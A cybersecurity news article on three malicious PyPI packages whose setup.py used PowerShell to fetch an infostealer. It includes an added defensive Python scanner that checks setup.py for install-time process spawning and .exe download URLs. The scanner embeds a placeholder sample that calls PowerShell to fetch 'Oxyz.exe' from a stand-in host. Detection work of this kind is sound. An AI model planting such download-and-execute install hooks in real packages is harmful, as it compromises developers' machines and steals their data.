Programmers: look out for these infostealers on the Python Package Index


Three malicious packages carrying infostealers were recently discovered, and subsequently removed, from the PyPI repository.

Researchers from Fortinet found three packages, uploaded between January 7 and 12 by a user named “Lollip0p”. The three are called “colorslib”, “httpslib”, and “libhttps”; if you have ever installed any of them, remove them immediately.

Usually, cybercriminals looking to compromise Python developer endpoints via PyPI try typosquatting - giving their malicious packages names almost identical to those of legitimate projects. That way, developers who are either reckless or in a hurry might unknowingly pull in the malicious package instead of the clean one.

Stealing browser data

This campaign, however, is different, as these three have unique names. To build trust, the attacker drafted complete descriptions for the packages. While the total download count for these three hardly surpassed 500, it might still prove devastating if it’s a part of a larger supply chain, the publication states.

In all three cases, the packages ship a file called “setup.py” which launches PowerShell to download an executable called “Oxyz.exe” from the internet. The researchers say this executable is malicious and steals browser information. We don’t know exactly what type of information the malware is looking to steal, but infostealers usually go for saved passwords, credit card data, cryptocurrency wallets, and other valuable information.
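The install-time behaviour described above (a setup.py that spawns PowerShell to fetch an executable) is something a defender can triage statically before ever running `pip install`. The following is an added example, not code from the article, Fortinet, or any of the packages named here: it parses a setup.py with Python’s `ast` module and flags process-spawning calls that mention PowerShell, string literals containing URLs to `.exe` files, and `setup(name=...)` values matching the three package names from the article. The sample setup.py embedded below is constructed for illustration, and `example.invalid` is a placeholder host.

```python
"""Static triage of a package's setup.py for install-time download-and-execute behaviour.

Added example (not the article's or Fortinet's code). It walks the AST of a
setup.py and reports:
  - subprocess/os calls that launch PowerShell or otherwise spawn a process,
  - string literals containing URLs that point at .exe files,
  - setup(name=...) values on the known-bad list from the article.
"""
import ast
import re
from typing import List

# Package names the article reports as malicious (since removed from PyPI).
KNOWN_BAD_NAMES = {"colorslib", "httpslib", "libhttps"}

# (module, function) pairs that hand a command to a shell or spawn a process.
EXEC_FUNCS = {
    ("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
    ("subprocess", "check_output"), ("subprocess", "check_call"),
    ("os", "system"), ("os", "popen"),
}

# URL ending in .exe, case-insensitive.
EXE_URL_RE = re.compile(r"https?://\S+?\.exe\b", re.IGNORECASE)


def _qualname(node: ast.AST) -> str:
    """Return 'mod.attr' for an attribute call target, a bare name, or ''."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return f"{node.value.id}.{node.attr}"
    if isinstance(node, ast.Name):
        return node.id
    return ""


def _string_literals(node: ast.AST) -> List[str]:
    """Collect every string constant nested under `node`."""
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def scan_setup_py(source: str) -> List[str]:
    """Return human-readable findings for the given setup.py source text."""
    findings: List[str] = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _qualname(node.func)
            mod, _, attr = name.partition(".")
            if (mod, attr) in EXEC_FUNCS:
                args_text = " ".join(_string_literals(node)).lower()
                if "powershell" in args_text or "pwsh" in args_text:
                    findings.append(f"line {node.lineno}: {name}() launches PowerShell")
                else:
                    findings.append(f"line {node.lineno}: {name}() spawns a process at install time")
            # setup(name=...) matching a name the article reports as malicious.
            if name in ("setup", "setuptools.setup"):
                for kw in node.keywords:
                    if (kw.arg == "name" and isinstance(kw.value, ast.Constant)
                            and kw.value.value in KNOWN_BAD_NAMES):
                        findings.append(
                            f"line {kw.value.lineno}: package name {kw.value.value!r} is on the known-bad list")
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in EXE_URL_RE.findall(node.value):
                findings.append(f"line {node.lineno}: downloads executable {url}")
    return findings


# Constructed sample modelled on the behaviour the article describes; the
# PowerShell command body is deliberately a placeholder, not a working downloader.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
import subprocess

# constructed sample
subprocess.run(["powershell", "-Command", "<fetch-and-run> http://example.invalid/Oxyz.exe"])

setup(name="httpslib", version="1.0.0", packages=[])
'''

CLEAN_SETUP_PY = 'from setuptools import setup\nsetup(name="mypkg", version="0.1", packages=[])\n'


if __name__ == "__main__":
    for finding in scan_setup_py(SAMPLE_SETUP_PY):
        print(finding)
```

Run it against an unpacked sdist (`pip download --no-binary :all: <pkg>` then extract) before installing; any finding of a spawned process or an executable URL in setup.py is reason to stop and inspect, since nothing in a normal build script needs either.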

The report also found that the detection rate for these executables is relatively low (up to 13.5%), meaning the attackers can successfully siphon out data even from endpoints protected by antivirus solutions.

While the malicious packages have already been removed from PyPI, nothing stops the attackers from simply uploading them again under a different name and from a different account. With that in mind, the best way to protect against this type of supply chain attack is to be particularly careful when pulling code building blocks from public repositories.

Via: BleepingComputer


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
